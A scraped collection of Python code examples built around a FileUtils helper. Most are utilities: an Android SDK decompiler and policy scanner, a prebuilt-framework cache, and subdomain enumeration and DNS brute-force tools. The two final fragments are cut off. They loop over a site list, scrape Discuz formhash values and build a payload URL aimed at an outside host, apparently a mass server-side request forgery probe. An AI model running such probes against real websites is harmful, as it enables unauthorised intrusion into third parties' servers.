Exemplo n.º 1
0
    def smali_decompile(self, jar_path):
        """Convert a jar to dex with dx, then decompile the dex to smali with baksmali.

        Args:
            jar_path: path to the input jar file.

        Returns:
            False when baksmali produced an empty smali directory or raised;
            True otherwise (including when dx produced no dex file at all).
        """
        dx_path = os.path.join(config.TOOL_PATH, "dx.jar")
        dex_path = os.path.join(config.unzip_path, "classes.dex")
        baksmali_jar_path = os.path.join(config.TOOL_PATH, "baksmali.jar")

        # jar -> dex
        process = subprocess.Popen(
            ["java", "-jar", dx_path, "--dex", "--output", dex_path, jar_path],
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT)
        process.communicate()

        if FileUtils.is_file_exit(dex_path):
            try:
                # dex -> smali. Argument list with shell=False (matching the
                # dx call above) instead of a hand-quoted shell string: safe
                # for paths containing spaces or shell metacharacters.
                p = subprocess.Popen(
                    ["java", "-jar", baksmali_jar_path,
                     "-o", config.smali_path, dex_path],
                    stdin=subprocess.PIPE,
                    stdout=subprocess.PIPE,
                    stderr=subprocess.PIPE)
                p.communicate()
                if FileUtils.is_dir_empty(config.smali_path):
                    logging.error(u"反编译smali失败")
                    return False
            except Exception as e:
                logging.error(u"反编译smali失败,原因:%s", e)
                return False

        return True
Exemplo n.º 2
0
 def zip_subdirs(from_dir, to_dir):
     """Archive every non-hidden sub-directory of from_dir as to_dir/<name>.zip."""
     logger.info('zip_subdirs {} -> {}'.format(from_dir, to_dir))
     FileUtils.create_dir(to_dir)
     for subdir in FileUtils.listdir_nohidden(from_dir):
         logger.info('zip dir: {}'.format(subdir))
         src = '{}/{}'.format(from_dir, subdir)
         dst = '{}/{}.zip'.format(to_dir, subdir)
         ZipUtils.zip_dir(src, dst)
Exemplo n.º 3
0
    def unzip(file_path, dst_path):
        """Extract a zip archive into dst_path.

        Args:
            file_path: path to the zip archive.
            dst_path: target directory; created (mode 0o777) if missing.

        Returns:
            False when file_path is not a valid zip file, True otherwise.
        """
        if not zipfile.is_zipfile(file_path):
            return False

        if not os.path.exists(dst_path):
            os.mkdir(dst_path, 0o777)

        # Context manager guarantees the archive handle is closed even when
        # an extraction step raises (the original never closed it).
        # NOTE(review): entry names are joined to dst_path unchecked, so a
        # crafted archive containing "../" entries can escape dst_path
        # (zip-slip) — consider validating names against dst_path.
        with zipfile.ZipFile(file_path) as zfobj:
            for name in zfobj.namelist():
                oriname = name
                # On Windows, normalise the archive's '/' separators.
                if os.sep == '\\':
                    name = name.replace('/', os.sep)
                if name.endswith(os.sep):
                    # Directory entry: just make sure it exists.
                    FileUtils.create_dir(os.path.join(dst_path, name))
                else:
                    filepath = os.path.join(dst_path, name)
                    parent = os.path.dirname(filepath)

                    if not os.path.exists(parent):
                        FileUtils.create_dir(parent)

                    # 'with' closes the output file even if read/write fails.
                    with open(filepath, 'wb') as out_file:
                        out_file.write(zfobj.read(oriname))

        return True
 def zip_all_libs_to_cache(self):
     """Zip every generated lib directory into the cache and copy the manifest.

     The cache libs directory is reset first so stale archives do not survive.
     """
     # Recreate the directory instead of shelling out to `rm -rf ... /*`:
     # no shell injection / word-splitting on paths containing spaces, and
     # consistent with the remove_dir/create_dir pattern used elsewhere.
     # NOTE(review): unlike `rm -rf dir/*` this also removes dotfiles —
     # assumed acceptable since the dir only holds generated .zip files.
     FileUtils.remove_dir(self.cache_libs_path)
     FileUtils.create_dir(self.cache_libs_path)
     for lib_dir in FileUtils.listdir_nohidden(self.generated_path):
         ZipUtils.zip_dir(self.generated_path + '/' + lib_dir,
                          self.cache_libs_path + '/' + lib_dir + '.zip')
     FileUtils.copy_file_or_dir(self.prebuild_path + self.manifest_file,
                                self.cache_path)
Exemplo n.º 5
0
    def start(self):
        """Entry point: validate the SDK file, unpack/decompile it, then scan.

        Accepts a .aar (unzipped; must contain classes.jar and
        AndroidManifest.xml) or a .jar (copied into the unzip dir) input.
        """
        # Preparation: unzip and decompile.
        logging.info("start sdk scan..")
        if not FileUtils.is_file_exit(self.sdk_path):
            logging.error("sdk文件不存在")
            return
        # File extension decides the handling path.
        pix = os.path.splitext(self.sdk_path)[1]

        if pix not in ('.aar', '.jar'):
            logging.error("sdk文件格式错误")
            return

        sdkinfo.sdk_path = self.sdk_path

        is_aar = pix == '.aar'
        if is_aar:
            logging.info("start unzip..")
            if not ZipUtils.unzip(sdkinfo.sdk_path, config.unzip_path):
                logging.error("unzip error")
                return

            config.jar_path = os.path.join(config.unzip_path, "classes.jar")
            config.res_path = os.path.join(config.unzip_path, "res")
            config.xml_path = os.path.join(config.unzip_path,
                                           "AndroidManifest.xml")
            config.jni_path = os.path.join(config.unzip_path, "jni")
            config.assets_path = os.path.join(config.unzip_path, "assets")
            config.libs_path = os.path.join(config.unzip_path, "libs")

            # classes.jar and the manifest are mandatory in an .aar.
            if not FileUtils.is_file_exit(
                    config.jar_path) or not FileUtils.is_file_exit(
                        config.xml_path):
                logging.info("unzip fail,no jar or xml file.")
                return
            logging.info("unzip success.")
        else:
            config.jar_path = os.path.join(config.unzip_path, "classes.jar")
            # Copy the input jar itself. The original read config.sdk_path,
            # which is never assigned in this flow; self.sdk_path is the
            # actual input path (mirrored into sdkinfo.sdk_path above).
            shutil.copy(self.sdk_path, config.jar_path)

        logging.info("start decompile java.")
        count = self.get_class_file(config.jar_path)
        if self.cfr_decompile(config.jar_path, count):
            logging.info("decompile java success.")
        else:
            logging.info("decompile java error.")

        logging.info("start decompile smali.")
        if self.smali_decompile(config.jar_path):
            logging.info("decompile smali success.")
        else:
            logging.info("decompile smali error.")

        self.scan(is_aar)
Exemplo n.º 6
0
    def scan(self):
        """Run the policy checks: manifest permissions, native .so ABIs, APIs."""
        if not FileUtils.is_file_exit(config.POLICY_PERMISSION_PATH):
            logging.error("POLICY_TXT not in.")
            return

        if not FileUtils.is_file_exit(config.xml_path):
            logging.info("no xml")
        else:
            self.find_permission_policy()
            if int(sdkinfo.target_sdk_version) < 28:
                self.target_sdk = True

        self.so_policy()

        self.find_api_policy()
Exemplo n.º 7
0
    def get_info(self):
        """Populate sdkinfo with name, size and AndroidManifest.xml attributes.

        Reads the manifest line by line, extracting package name, versionName,
        declared permissions, min/target SDK versions, allowBackup and
        debuggable flags. Returns early when no manifest is present.
        """
        sdkinfo.sdk_name = os.path.splitext(os.path.basename(
            sdkinfo.sdk_path))[0]
        # Size in whole kilobytes, stored as a string.
        sdkinfo.sdk_size = str(int(os.path.getsize(sdkinfo.sdk_path) / 1024))
        if not FileUtils.is_file_exit(config.xml_path):
            return

        # Compiled once, hoisted out of the per-line loop. Each pattern
        # requires a whitespace character after the closing quote, exactly
        # as in the original.
        re_name = re.compile(r"package=\"(.*?)\"\s")
        re_version = re.compile(r"versionName=\"(.*?)\"\s")
        re_per = re.compile(r"android:name=\"(.*?)\"\s")
        re_min = re.compile(r"android:minSdkVersion=\"(.*?)\"\s")
        re_target = re.compile(r"android:targetSdkVersion=\"(.*?)\"\s")
        re_allow = re.compile(r"android:allowBackup=\"(.*?)\"\s")
        re_debug = re.compile(r"android:debuggable=\"(.*?)\"\s")

        with open(config.xml_path, 'r', encoding='utf-8') as file:
            # search() + guard replaces findall(...)[0]: the original raised
            # IndexError whenever the substring was present but the
            # trailing-whitespace regex form did not match (e.g. attribute
            # directly before the closing '>').
            for line in file:
                if line.find('package=') > -1:
                    m = re_name.search(line)
                    if m:
                        sdkinfo.package_name = m.group(1)
                if line.find('versionName') > -1:
                    m = re_version.search(line)
                    if m:
                        sdkinfo.version_name = m.group(1)
                if line.find('uses-permission') > -1:
                    m = re_per.search(line)
                    if m:
                        sdkinfo.permissions.append(m.group(1))
                if line.find('minSdkVersion') > -1:
                    m = re_min.search(line)
                    if m:
                        sdkinfo.min_sdk_version = m.group(1)
                if line.find('targetSdkVersion') > -1:
                    m = re_target.search(line)
                    if m:
                        sdkinfo.target_sdk_version = m.group(1)
                if line.find("android:allowBackup") > -1:
                    m = re_allow.search(line)
                    if m:
                        sdkinfo.allow_back_up = m.group(1).lower() == "true"
                if line.find("android:debuggable") > -1:
                    m = re_debug.search(line)
                    if m:
                        sdkinfo.debuggable = m.group(1).lower() == "true"
Exemplo n.º 8
0
def save_result(filename, args):
    """Serialize args as pretty-printed JSON into filename.

    NOTE(review): writes only when FileUtils.exists(filename) is truthy —
    if that really tests the file itself (not, say, its directory), fresh
    result files are never created; confirm against FileUtils.
    """
    if FileUtils.exists(filename):
        # 'with' replaces the try/finally: the original raised NameError in
        # the finally clause when open() itself failed (fd never bound), and
        # this still guarantees the handle is closed.
        with open(filename, 'w') as fd:
            json.dump(args, fd, indent=4)
Exemplo n.º 9
0
def read_json(filename):
    """Load and return the JSON content of filename, or [] when it is absent.

    Propagates whatever open()/json.load() raise for unreadable or
    malformed files.
    """
    if not FileUtils.exists(filename):
        return []
    # 'with' replaces the try/finally: the original raised NameError in the
    # finally clause when open() itself failed (fd never bound).
    with open(filename, 'r') as fd:
        return json.load(fd)
Exemplo n.º 10
0
 def scan(self, path):
     """Scan every file under path; return file count plus per-file results."""
     files = FileUtils.getFiles(path)
     # Keep only truthy per-file results.
     hits = [sr for sr in (self.scanFile(fp) for fp in files) if sr]
     return {'fileCount': len(files), 'data': hits}
Exemplo n.º 11
0
    def prebuild_if_needed(self, push=True):
        """Run `pod install` and sync changed prebuilt frameworks with the cache.

        Parses the delta file produced by the install step: frameworks listed
        as Updated are re-zipped into the cache, those listed as Deleted are
        evicted, then the manifest is copied and the cache optionally pushed.

        Args:
            push: when True, push the refreshed cache directory to git.
        """
        self.fetch_and_apply_cache()
        subprocess.run(['bundle', 'exec', 'pod', 'install'], check=True)
        # Sync with cache directory

        if not os.path.isfile(self.delta_path):
            logger.info('No change in prebuilt frameworks')
            return
        # The original wrapped everything below in
        # `except Exception as e: raise e`, a no-op re-raise; dropped so the
        # traceback points straight at the real failure site.
        with open(self.delta_path) as f:
            FileUtils.create_dir(self.cache_path)
            # Strip quotes so the bracketed lists parse as bare names.
            data = re.sub('"', '', f.read())

            updatedMatches = re.findall(r'Updated: \[(.*)\]', data)
            if updatedMatches:
                updated = updatedMatches[0].strip()
                logger.info("Updated frameworks: {}".format(updated))
                if updated:
                    for lib in updated.split(','):
                        libName = lib.strip()
                        self.clean_cache(libName)
                        self.zip_to_cache(libName)

            deletedMatches = re.findall(r'Deleted: \[(.*)\]', data)
            if deletedMatches:
                deleted = deletedMatches[0].strip()
                logger.info('Deleted frameworks: {}'.format(deleted))
                if deleted:
                    for lib in deleted.split(','):
                        self.clean_cache(lib.strip())

            # Copy manifest file
            FileUtils.copy_file_or_dir(
                self.prebuild_path + self.manifest_file, self.cache_path)
            if push:
                self.push_all_to_git(self.cache_path)
Exemplo n.º 12
0
 def unzip_cache(self):
     """Rebuild the prebuild folder by unzipping every cached lib archive."""
     logger.info(f'Unzip cache, from {self.cache_libs_path} to {self.generated_path}')
     with step('unzip_prebuild_libs'):
         FileUtils.remove_dir(self.prebuild_path)
         FileUtils.create_dir(self.generated_path)
         manifest_src = os.path.join(self.cache_path, self.manifest_file)
         FileUtils.copy_file_or_dir(manifest_src, self.prebuild_path)
         # Extract each cached archive into the generated folder.
         pattern = os.path.join(self.cache_libs_path, '*.zip')
         for archive in glob.iglob(pattern):
             ZipUtils.unzip(archive, self.generated_path)
Exemplo n.º 13
0
 def unzip_cache(self):
     """Recreate the prebuild folder from the zipped cache archives."""
     with step('unzip_prebuild_libs'):
         FileUtils.remove_dir(self.prebuild_path)
         FileUtils.create_dir(self.generated_path)
         # NOTE(review): plain '+' concat — assumes cache_path carries a
         # trailing separator; confirm.
         manifest_src = self.cache_path + self.manifest_file
         FileUtils.copy_file_or_dir(manifest_src, self.prebuild_path)
         # Unzip each cached lib archive into the generated folder.
         for archive in glob.iglob(self.cache_libs_path + '/*.zip'):
             ZipUtils.unzip(archive, self.generated_path)
 def __init__(self, target, dict_file='domain.csv'):
     """Load the brute-force dictionary and set up a resolver over public DNS."""
     super(DomainFuzzer, self).__init__()
     self.target = target
     self.dict = FileUtils.getLines(dict_file)
     # Mix of domestic (CN) and global public resolvers.
     self.nameservers = [
         '114.114.114.114', '119.29.29.29', '223.5.5.5', '8.8.8.8',
         '182.254.116.116', '223.6.6.6', '8.8.4.4', '180.76.76.76',
         '216.146.35.35', '123.125.81.6', '218.30.118.6',
     ]
     self.resolver = Domain(self.nameservers, timeout=5)
Exemplo n.º 15
0
 def so_policy(self):
     """Set self.so_64 when no 64-bit (arm64-v8a / x86_64) native lib dirs are found."""
     if not FileUtils.is_dir_exit(config.jni_path):
         # No jni folder: fall back to probing the unzip folder instead.
         if FileUtils.is_dir_exit(config.unzip_path):
             arm64_dir = os.path.join(config.unzip_path, "arm64-v8a")
             x86_64_dir = os.path.join(config.unzip_path, "x86_64")
             self.so_64 = (FileUtils.is_dir_empty(arm64_dir)
                           and FileUtils.is_dir_empty(x86_64_dir))
     else:
         arm64_dir = os.path.join(config.jni_path, "arm64-v8a")
         x86_64_dir = os.path.join(config.jni_path, "x86_64")
         if not (FileUtils.is_dir_exit(arm64_dir)
                 or FileUtils.is_dir_exit(x86_64_dir)):
             self.so_64 = True
Exemplo n.º 16
0
 def test_decrypt_file(self):
     """Manually decrypt a sample AXF zip with 3DES-ECB and dump the plaintext to ./1.txt.

     NOTE(review): Python 2 only (bare `print` statement at the end),
     hard-coded absolute input path and key — a scratch/debug test, not
     runnable outside the original author's machine.
     """
     content = FileUtils.read_all_data(
         '/Users/apple/PycharmProjects/workspace/axf_library/library/utils/tests/J_CBIB0020_AXF_20180605.zip')
     # content = base64.decodestring(content)
     # print content
     # print b2a_hex(content)
     # 24-char 3DES key; ECB mode, so no IV is involved.
     key = '132e8a57b4f6139b3a5de9g4'
     # Des3FileUtils.encrypt_file("/Users/apple/liaoshanqing/tmp/test_file_crypt.txt",
     #                            '/Users/apple/liaoshanqing/tmp/test_file_crypt_1.txt', 8192, key, iv)
     # Des3FileUtils.decrypt_file('./IMGDOC0001_AWX_20170724_0002.zip',
     #                            './axf_test.zip', 8192, key)
     des3 = DES3.new(key, DES3.MODE_ECB)
     with open('./1.txt', 'wb') as out_file:
         result = des3.decrypt(content)
         # print result
         # result = base64.decodestring(result)
         # print result.decode('gbk')
         # print b2a_hex(result)
         out_file.write(result)
     print 'ok'
Exemplo n.º 17
0
 def delete(self):
     """Remove the temporary working directory tree."""
     temp_dir = config.temp_path
     FileUtils.delete_dirs(temp_dir)
Exemplo n.º 18
0
def run(args):
    """Collect subdomains of args.domain from public sources; save to args.out.

    Each fetcher's result is cached as JSON under result/<domain>/; the
    de-duplicated union (plus any dnsburte.json brute-force results) is
    written to args.out next to this script. Exits with status 1 when no
    domain was given.
    """
    domain = args.domain
    outfile = args.out

    if not domain:
        print('usage: wydomain.py -d aliyun.com')
        sys.exit(1)

    # init _cache_path
    script_path = os.path.dirname(os.path.abspath(__file__))
    _cache_path = os.path.join(script_path, 'result/{0}'.format(domain))
    if not os.path.exists(_cache_path):
        # 0o777: octal literal valid on Python 2.6+ AND 3 — the original
        # 0777 form is a syntax error on Python 3.
        os.makedirs(_cache_path, 0o777)

    # One (label, fetcher class, cache file) entry per passive source; each
    # followed the identical fetch -> save -> log copy/paste stanza, now a
    # single data-driven loop (rendered log text is unchanged).
    fetchers = [
        ('alexa', Alexa, 'alexa.json'),
        ('threatminer', Threatminer, 'threatminer.json'),
        ('threatcrowd', Threatcrowd, 'threatcrowd.json'),
        ('sitedossier', Sitedossier, 'sitedossier.json'),
        ('netcraft', Netcraft, 'netcraft.json'),
        ('ilinks', Ilinks, 'ilinks.json'),
        ('chaxunla', Chaxunla, 'chaxunla.json'),
    ]
    for label, fetcher_cls, cache_name in fetchers:
        logging.info("starting {0} fetcher...".format(label))
        _cache_file = os.path.join(_cache_path, cache_name)
        result = fetcher_cls(domain=domain).run()
        save_result(_cache_file, result)
        logging.info("{0} fetcher subdomains({1}) successfully...".format(
            label, len(result)))

    # google TransparencyReport result json file
    logging.info("starting google TransparencyReport fetcher...")
    result = TransparencyReport(domain=domain).run()
    _cache_file = os.path.join(_cache_path, 'googlect_subject.json')
    save_result(_cache_file, result.get('subjects'))
    _cache_file = os.path.join(_cache_path, 'googlect_dnsnames.json')
    save_result(_cache_file, result.get('dns_names'))
    logging.info("google TransparencyReport fetcher subdomains({0}) successfully...".format(len(result.get('dns_names'))))

    # Collection API Subdomains: merge every fetcher's cached JSON.
    subdomains = []
    for _, _, cache_name in fetchers:
        json_data = read_json(os.path.join(_cache_path, cache_name))
        if json_data:
            subdomains.extend(json_data)

    # process openssl x509 dns_names (keep only names under the target domain)
    _cache_file = os.path.join(_cache_path, 'googlect_dnsnames.json')
    for sub in read_json(_cache_file):
        if sub.endswith(domain):
            subdomains.append(sub)

    # collection brute force subdomains
    _burte_file = os.path.join(_cache_path, 'dnsburte.json')
    if FileUtils.exists(_burte_file):
        json_data = read_json(_burte_file)
        if json_data:
            subdomains.extend(json_data)

    # save all subdomains to outfile, de-duplicated
    subdomains = list(set(subdomains))
    _result_file = os.path.join(script_path, outfile)
    save_result(_result_file, subdomains)
    logging.info("{0} {1} subdomains save to {2}".format(
        domain, len(subdomains), _result_file))
def run(args):
    """Collect subdomains of args.domain from public sources.

    Variant that writes to '<domain>_wy.txt' instead of args.out. Each
    fetcher's result is cached as JSON under result/<domain>/; the
    de-duplicated union (plus any dnsburte.json brute-force results) is
    written next to this script. Exits with status 1 when no domain given.
    """
    domain = args.domain
    outfile = args.domain + '_wy.txt'

    if not domain:
        print('usage: wydomain.py -d aliyun.com')
        sys.exit(1)

    # init _cache_path
    script_path = os.path.dirname(os.path.abspath(__file__))
    _cache_path = os.path.join(script_path, 'result/{0}'.format(domain))
    if not os.path.exists(_cache_path):
        # 0o777: octal literal valid on Python 2.6+ AND 3 — the original
        # 0777 form is a syntax error on Python 3.
        os.makedirs(_cache_path, 0o777)

    # One (label, fetcher class, cache file) entry per passive source; each
    # followed the identical fetch -> save -> log copy/paste stanza, now a
    # single data-driven loop (rendered log text is unchanged).
    fetchers = [
        ('alexa', Alexa, 'alexa.json'),
        ('threatminer', Threatminer, 'threatminer.json'),
        ('threatcrowd', Threatcrowd, 'threatcrowd.json'),
        ('sitedossier', Sitedossier, 'sitedossier.json'),
        ('netcraft', Netcraft, 'netcraft.json'),
        ('ilinks', Ilinks, 'ilinks.json'),
        ('chaxunla', Chaxunla, 'chaxunla.json'),
    ]
    for label, fetcher_cls, cache_name in fetchers:
        logging.info("starting {0} fetcher...".format(label))
        _cache_file = os.path.join(_cache_path, cache_name)
        result = fetcher_cls(domain=domain).run()
        save_result(_cache_file, result)
        logging.info("{0} fetcher subdomains({1}) successfully...".format(
            label, len(result)))

    # google TransparencyReport result json file
    logging.info("starting google TransparencyReport fetcher...")
    result = TransparencyReport(domain=domain).run()
    _cache_file = os.path.join(_cache_path, 'googlect_subject.json')
    save_result(_cache_file, result.get('subjects'))
    _cache_file = os.path.join(_cache_path, 'googlect_dnsnames.json')
    save_result(_cache_file, result.get('dns_names'))
    logging.info("google TransparencyReport fetcher subdomains({0}) successfully...".format(len(result.get('dns_names'))))

    # Collection API Subdomains: merge every fetcher's cached JSON.
    subdomains = []
    for _, _, cache_name in fetchers:
        json_data = read_json(os.path.join(_cache_path, cache_name))
        if json_data:
            subdomains.extend(json_data)

    # process openssl x509 dns_names (keep only names under the target domain)
    _cache_file = os.path.join(_cache_path, 'googlect_dnsnames.json')
    for sub in read_json(_cache_file):
        if sub.endswith(domain):
            subdomains.append(sub)

    # collection brute force subdomains
    _burte_file = os.path.join(_cache_path, 'dnsburte.json')
    if FileUtils.exists(_burte_file):
        json_data = read_json(_burte_file)
        if json_data:
            subdomains.extend(json_data)

    # save all subdomains to outfile, de-duplicated
    subdomains = list(set(subdomains))
    _result_file = os.path.join(script_path, outfile)
    save_result(_result_file, subdomains)
    logging.info("{0} {1} subdomains save to {2}".format(
        domain, len(subdomains), _result_file))
Exemplo n.º 20
0
 def __init__(self, target, dict_file='domain.csv', timeout=5):
     """Load the dictionary lines and create a resolver with the given timeout."""
     self.dict = FileUtils.getLines(dict_file)
     self.resolver = Domain(timeout=timeout)
     self.target = target
Exemplo n.º 21
0
 def get_assets(self):
     """Record the file names under the SDK's assets folder into sdkinfo."""
     if FileUtils.is_file_exit(config.assets_path):
         # Walk assets_path — the original walked config.libs_path, which
         # contradicts the existence check above (copy/paste slip).
         for home, dirs, filenames in os.walk(config.assets_path):
             for filename in filenames:
                 sdkinfo.assets_files.append(filename)
Exemplo n.º 22
0
 def get_soname(self):
     """Store a .so file name found under the unzip tree into sdkinfo."""
     if not FileUtils.is_file_exit(config.jni_path):
         return
     # NOTE(review): guards on jni_path but walks the whole unzip_path, and
     # successive matches overwrite sdk_soname (only the last survives) —
     # confirm both are intended.
     for dirpath, dirnames, filenames in os.walk(config.unzip_path):
         for so_name in (f for f in filenames if f.endswith(".so")):
             sdkinfo.sdk_soname = so_name
Exemplo n.º 23
0
 def clean_cache(self, lib):
     """Delete the cached zip archive for the given lib, if present."""
     lib_path = os.path.join(self.cache_libs_path, f'{lib}.zip')
     logger.info(f'Clean cache of {lib} at {lib_path}')
     FileUtils.remove_file(lib_path)
Exemplo n.º 24
0
 def clean_cache(self, libName):
     """Remove the zipped cache entry for libName.

     Uses os.path.join: the original concatenated cache_libs_path + libName
     with no separator, so it never matched the '<dir>/<name>.zip' paths
     the zip step creates (see zip_all_libs_to_cache).
     """
     FileUtils.remove_file(os.path.join(self.cache_libs_path,
                                        libName + ".zip"))


import requests

from utils.fileutils import FileUtils



import requests.packages.urllib3

requests.packages.urllib3.disable_warnings()



for website in FileUtils.getLines('qqdz.lst'):

    request = requests.session()

    try:

        forumurl = "{website}/forum.php".format(website=website)

        response = request.get(forumurl, timeout=5, verify=False)

        formhash = re.findall(r'formhash" value="(.*?)"',response.content)

        netloc = urlparse.urlparse(website).netloc

        payload = 'http://fuzz.wuyun.com/404.php?s={netloc}.jpg'.format(netloc=netloc)
Exemplo n.º 26
0
import random

import time

import re

import requests

from utils.fileutils import FileUtils

import requests.packages.urllib3

requests.packages.urllib3.disable_warnings()

for website in FileUtils.getLines('qqdz.lst'):

    request = requests.session()

    try:

        forumurl = "{website}/forum.php".format(website=website)

        response = request.get(forumurl, timeout=5, verify=False)

        formhash = re.findall(r'formhash" value="(.*?)"', response.content)

        netloc = urlparse.urlparse(website).netloc

        payload = 'http://fuzz.wuyun.com/404.php?s={netloc}.jpg'.format(
            netloc=netloc)